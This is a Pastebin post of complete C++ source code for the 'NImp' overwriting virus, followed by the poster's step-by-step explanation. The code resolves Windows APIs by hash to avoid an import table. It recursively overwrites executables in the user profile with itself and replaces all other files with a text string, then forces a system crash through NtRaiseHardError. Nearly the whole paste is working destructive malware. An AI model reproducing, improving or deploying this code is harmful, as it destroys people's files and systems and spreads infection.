Advertisement
FlyFar

NImp Overwriting Virus - Source Code

Mar 2nd, 2023
476
0
Never
1
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C++ 8.45 KB | Cybersecurity | 0 0
  1. #include <Windows.h>
  2. #include "ntdll.h"
  3.  
  4. typedef enum _HARDERROR_RESPONSE_OPTION
  5. {
  6.     OptionAbortRetryIgnore,
  7.     OptionOk,
  8.     OptionOkCancel,
  9.     OptionRetryCancel,
  10.     OptionYesNo,
  11.     OptionYesNoCancel,
  12.     OptionShutdownSystem,
  13.     OptionOkNoWait,
  14.     OptionCancelTryContinue
  15. }HARDERROR_RESPONSE_OPTION;
  16.  
  17. typedef enum _HARDERROR_RESPONSE
  18. {
  19.     ResponseReturnToCaller,
  20.     ResponseNotHandled,
  21.     ResponseAbort,
  22.     ResponseCancel,
  23.     ResponseIgnore,
  24.     ResponseNo,
  25.     ResponseOk,
  26.     ResponseRetry,
  27.     ResponseYes,
  28.     ResponseTryAgain,
  29.     ResponseContinue
  30. }HARDERROR_RESPONSE;
  31.  
  32. typedef DWORD (WINAPI *pGetEnvironmentVariableA)(
  33.     LPCSTR lpName,
  34.     LPSTR lpBuffer,
  35.     DWORD nSize
  36.     );
  37.  
  38. typedef DWORD (WINAPI *pGetModuleFileNameA)(
  39.     HMODULE hModule,
  40.     LPSTR lpFilename,
  41.     DWORD nSize
  42.     );
  43.  
  44. typedef BOOL (WINAPI *pCopyFileA)(
  45.     LPCSTR lpExistingFileName,
  46.     LPCSTR lpNewFileName,
  47.     BOOL bFailIfExists
  48.     );
  49.  
  50. typedef HANDLE (WINAPI *pFindFirstFileA)(
  51.     LPCSTR lpFileName,
  52.     LPWIN32_FIND_DATAA lpFindFileData
  53.     );
  54.  
  55. typedef BOOL (WINAPI *pFindNextFileA)(
  56.     HANDLE hFindFile,
  57.     LPWIN32_FIND_DATAA lpFindFileData
  58.     );
  59.  
  60. typedef BOOL (WINAPI *pFindClose)(
  61.     HANDLE hFindFile
  62.     );
  63.  
  64. typedef HANDLE (WINAPI *pCreateFileA)(
  65.     LPCSTR lpFileName,
  66.     DWORD dwDesiredAccess,
  67.     DWORD dwShareMode,
  68.     LPSECURITY_ATTRIBUTES lpSecurityAttributes,
  69.     DWORD dwCreationDisposition,
  70.     DWORD dwFlagsAndAttributes,
  71.     HANDLE hTemplateFile
  72.     );
  73.  
  74. typedef BOOL (WINAPI *pWriteFile)(
  75.     HANDLE hFile,
  76.     LPCVOID lpBuffer,
  77.     DWORD nNumberOfBytesToWrite,
  78.     LPDWORD lpNumberOfBytesWritten,
  79.     LPOVERLAPPED lpOverlapped
  80.     );
  81.  
  82. typedef void (WINAPI *pSleep)(DWORD Timeout);
  83. typedef NTSTATUS (NTAPI *pNtClose)(HANDLE Handle);
  84.  
  85. typedef NTSTATUS (NTAPI *pNtRaiseHardError)(
  86.     NTSTATUS ErrorStatus,
  87.     ULONG NumberOfParameters,
  88.     ULONG UnicodeStringParameterMask,
  89.     PULONG_PTR Parameters,
  90.     ULONG ValidResponseOptions,
  91.     PULONG Response
  92. );
  93.  
  94. typedef NTSTATUS (NTAPI *pRtlAdjustPrivilege)(ULONG Privilege,BOOLEAN Enable,BOOLEAN CurrentThread,PBOOLEAN OldValue);
  95.  
  96. typedef int (__cdecl *p_sprintf)(char* str,char* format,...);
  97. typedef char* (__cdecl *p_strstr)(char* str,char* substr);
  98.  
  99. typedef struct _NIMP_FUNCTION_TABLE
  100. {
  101.     pGetEnvironmentVariableA fnGetEnvironmentVariableA;
  102.     pGetModuleFileNameA fnGetModuleFileNameA;
  103.     pCopyFileA fnCopyFileA;
  104.     pFindFirstFileA fnFindFirstFileA;
  105.     pFindNextFileA fnFindNextFileA;
  106.     pFindClose fnFindClose;
  107.     pCreateFileA fnCreateFileA;
  108.     pWriteFile fnWriteFile;
  109.     pSleep fnSleep;
  110.     pNtRaiseHardError fnNtRaiseHardError;
  111.     pRtlAdjustPrivilege fnRtlAdjustPrivilege;
  112.     pNtClose fnNtClose;
  113.     p_sprintf fn_sprintf;
  114.     p_strstr fn_strstr;
  115. }NIMP_FUNCTION_TABLE,*PNIMP_FUNCTION_TABLE;
  116.  
  117. NIMP_FUNCTION_TABLE NImpFunctionTable;
  118. char NImpFileName[120];
  119.  
  120. ULONG WINAPI NImpComputeHash(LPSTR String)
  121. {
  122.     PUCHAR ptr=(PUCHAR)String;
  123.     ULONG Hash=0;
  124.  
  125.     while(*ptr)
  126.     {
  127.         Hash=((Hash<<8)+Hash+*ptr)^(*ptr<<16);
  128.         ptr++;
  129.     }
  130.  
  131.     return Hash;
  132. }
  133.  
  134. PVOID WINAPI NImpGetFunctionFromHash(PVOID Module,ULONG Hash)
  135. {
  136.     PIMAGE_DOS_HEADER pIDH;
  137.     PIMAGE_NT_HEADERS pINH;
  138.     PIMAGE_EXPORT_DIRECTORY pIED;
  139.  
  140.     PULONG Function,Name;
  141.     PUSHORT Ordinal;
  142.  
  143.     ULONG i;
  144.  
  145.     pIDH=(PIMAGE_DOS_HEADER)Module;
  146.     pINH=(PIMAGE_NT_HEADERS)((PUCHAR)Module+pIDH->e_lfanew);
  147.  
  148.     pIED=(PIMAGE_EXPORT_DIRECTORY)((PUCHAR)Module+pINH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
  149.  
  150.     Function=(PULONG)((PUCHAR)Module+pIED->AddressOfFunctions);
  151.     Name=(PULONG)((PUCHAR)Module+pIED->AddressOfNames);
  152.  
  153.     Ordinal=(PUSHORT)((PUCHAR)Module+pIED->AddressOfNameOrdinals);
  154.  
  155.     for(i=0;i<pIED->NumberOfNames;i++)
  156.     {
  157.         if(NImpComputeHash((char*)Module+Name[i])==Hash)
  158.         {
  159.             return (PVOID)((PUCHAR)Module+Function[Ordinal[i]]);
  160.         }
  161.     }
  162.  
  163.     return NULL;
  164. }
  165.  
  166. void WINAPI NImpZeroMemory(PVOID Buffer,ULONG Length)
  167. {
  168.     PUCHAR ptr=(PUCHAR)Buffer;
  169.     ULONG i;
  170.  
  171.     for(i=0;i<Length;i++)
  172.     {
  173.         ptr[i]=0;
  174.     }
  175. }
  176.  
  177. void WINAPI NImpOverwriteFile(LPSTR FileName)
  178. {
  179.     HANDLE hFile;
  180.     DWORD write;
  181.  
  182.     char str[]="NImp <span class="searchlite">virus</span> by zwclose7!";
  183.  
  184.     hFile=NImpFunctionTable.fnCreateFileA(FileName,GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,0,NULL);
  185.  
  186.     if(hFile!=INVALID_HANDLE_VALUE)
  187.     {
  188.         NImpFunctionTable.fnWriteFile(hFile,str,sizeof(str),&write,NULL);
  189.         NImpFunctionTable.fnNtClose(hFile);
  190.     }
  191. }
  192.  
  193. void WINAPI NImpInfectFiles(LPSTR Directory)
  194. {
  195.     HANDLE hFind;
  196.     char SearchName[1024],FullPath[1024];
  197.  
  198.     WIN32_FIND_DATAA FindData;
  199.  
  200.     NImpZeroMemory(SearchName,sizeof(SearchName));
  201.     NImpFunctionTable.fn_sprintf(SearchName,"%s\\*",Directory);
  202.  
  203.     hFind=NImpFunctionTable.fnFindFirstFileA(SearchName,&FindData);
  204.  
  205.     if(hFind!=INVALID_HANDLE_VALUE)
  206.     {
  207.         while(NImpFunctionTable.fnFindNextFileA(hFind,&FindData))
  208.         {
  209.             if(FindData.cFileName[0]=='.')
  210.             {
  211.                 continue;
  212.             }
  213.  
  214.             NImpZeroMemory(FullPath,sizeof(FullPath));
  215.             NImpFunctionTable.fn_sprintf(FullPath,"%s\\%s",Directory,FindData.cFileName);
  216.  
  217.             if(FindData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
  218.             {
  219.                 NImpInfectFiles(FullPath);
  220.             }
  221.  
  222.             else
  223.             {
  224.                 if(NImpFunctionTable.fn_strstr(FindData.cFileName,".exe"))
  225.                 {
  226.                     NImpFunctionTable.fnCopyFileA(NImpFileName,FullPath,FALSE);
  227.                 }
  228.  
  229.                 else
  230.                 {
  231.                     NImpOverwriteFile(FullPath);
  232.                 }
  233.             }
  234.  
  235.             NImpFunctionTable.fnSleep(10);
  236.         }
  237.  
  238.         NImpFunctionTable.fnFindClose(hFind);
  239.     }
  240. }
  241.  
  242. void WINAPI NImpMain()
  243. {
  244.     PVOID Kernel32Base,NtdllBase;
  245.     ULONG Response;
  246.  
  247.     PPEB Peb;
  248.     PLDR_DATA_TABLE_ENTRY Ldr;
  249.  
  250.     BOOLEAN bl;
  251.     char Path[120];
  252.  
  253.     Peb=NtCurrentPeb();
  254.      
  255.     NImpZeroMemory(Path,sizeof(Path));
  256.     NImpZeroMemory(&NImpFunctionTable,sizeof(NIMP_FUNCTION_TABLE));
  257.     NImpZeroMemory(NImpFileName,sizeof(NImpFileName));
  258.  
  259.     Ldr=CONTAINING_RECORD(Peb->Ldr->InMemoryOrderModuleList.Flink,LDR_DATA_TABLE_ENTRY,InMemoryOrderLinks.Flink);
  260.  
  261.     Ldr=CONTAINING_RECORD(Ldr->InMemoryOrderLinks.Flink,LDR_DATA_TABLE_ENTRY,InMemoryOrderLinks.Flink);
  262.     NtdllBase=Ldr->DllBase;
  263.  
  264.     Ldr=CONTAINING_RECORD(Ldr->InMemoryOrderLinks.Flink,LDR_DATA_TABLE_ENTRY,InMemoryOrderLinks.Flink);
  265.     Kernel32Base=Ldr->DllBase;
  266.  
  267.     NImpFunctionTable.fnGetEnvironmentVariableA=(pGetEnvironmentVariableA)NImpGetFunctionFromHash(Kernel32Base,0x3363dd1c);
  268.     NImpFunctionTable.fnGetModuleFileNameA=(pGetModuleFileNameA)NImpGetFunctionFromHash(Kernel32Base,0x2d6f58c8);
  269.     NImpFunctionTable.fnCopyFileA=(pCopyFileA)NImpGetFunctionFromHash(Kernel32Base,0x932fb15c);
  270.     NImpFunctionTable.fnFindFirstFileA=(pFindFirstFileA)NImpGetFunctionFromHash(Kernel32Base,0xbe28834a);
  271.     NImpFunctionTable.fnFindNextFileA=(pFindNextFileA)NImpGetFunctionFromHash(Kernel32Base,0x85776e1);
  272.     NImpFunctionTable.fnFindClose=(pFindClose)NImpGetFunctionFromHash(Kernel32Base,0x7223b77);
  273.     NImpFunctionTable.fnCreateFileA=(pCreateFileA)NImpGetFunctionFromHash(Kernel32Base,0xd83eb415);
  274.     NImpFunctionTable.fnWriteFile=(pWriteFile)NImpGetFunctionFromHash(Kernel32Base,0xa5e7378b);
  275.     NImpFunctionTable.fnSleep=(pSleep)NImpGetFunctionFromHash(Kernel32Base,0xf5d3c0f9);
  276.  
  277.     NImpFunctionTable.fnNtClose=(pNtClose)NImpGetFunctionFromHash(NtdllBase,0x5a4bbb8);
  278.     NImpFunctionTable.fnNtRaiseHardError=(pNtRaiseHardError)NImpGetFunctionFromHash(NtdllBase,0x602b783f);
  279.  
  280.     NImpFunctionTable.fnRtlAdjustPrivilege=(pRtlAdjustPrivilege)NImpGetFunctionFromHash(NtdllBase,0xb411bb44);
  281.  
  282.     NImpFunctionTable.fn_sprintf=(p_sprintf)NImpGetFunctionFromHash(NtdllBase,0xc07d3806);
  283.     NImpFunctionTable.fn_strstr=(p_strstr)NImpGetFunctionFromHash(NtdllBase,0x534bc1b2);
  284.  
  285.     NImpFunctionTable.fnGetEnvironmentVariableA("userprofile",Path,sizeof(Path));
  286.     NImpFunctionTable.fnGetModuleFileNameA(NULL,NImpFileName,sizeof(NImpFileName));
  287.  
  288.     NImpInfectFiles(Path);
  289.  
  290.     NImpFunctionTable.fnRtlAdjustPrivilege(19,TRUE,FALSE,&bl);
  291.     NImpFunctionTable.fnNtRaiseHardError(0xC000026A,0,0,NULL,OptionShutdownSystem,&Response);
  292. }
Advertisement
Comments
  • FlyFar
    1 year
    # text 0.99 KB | 0 0
    1. NImp is a overwriting virus written in C++. The name NImp stands for "No import table", because it's executable has no import table. The virus resolves all need functions by hashes.
    2.  
    3.  
    4.  
    5. The virus will search for files in user profile. If the file is executable file, the virus will infect by overwriting the file with the virus. Otherwise, the virus will overwrite the file with a string.
    6.  
    7.  
    8.  
    9. How the virus works
    10.  
    11.  
    12.  
    13. 1) The virus get the address of PEB.
    14.  
    15.  
    16.  
    17. 2) The virus read the loader data from PEB to get the base address of kernel32 and ntdll.
    18.  
    19.  
    20.  
    21. 3) The virus resolves all needed functions by hashes.
    22.  
    23.  
    24.  
    25. 4) The virus search for files in user profile.
    26.  
    27.  
    28.  
    29. 5) If the file is executable file, the virus will infect it by overwriting the file with the virus. Otherwise, the virus will overwrite the file with a string.
    30.  
    31.  
    32.  
    33. 6) After searching all files, the virus calls RtlAdjustPrivilege to enable SeShutdownPrivilege, and then calls NtRaiseHardError to crash the operating system.
Add Comment
Please, Sign In to add comment
Advertisement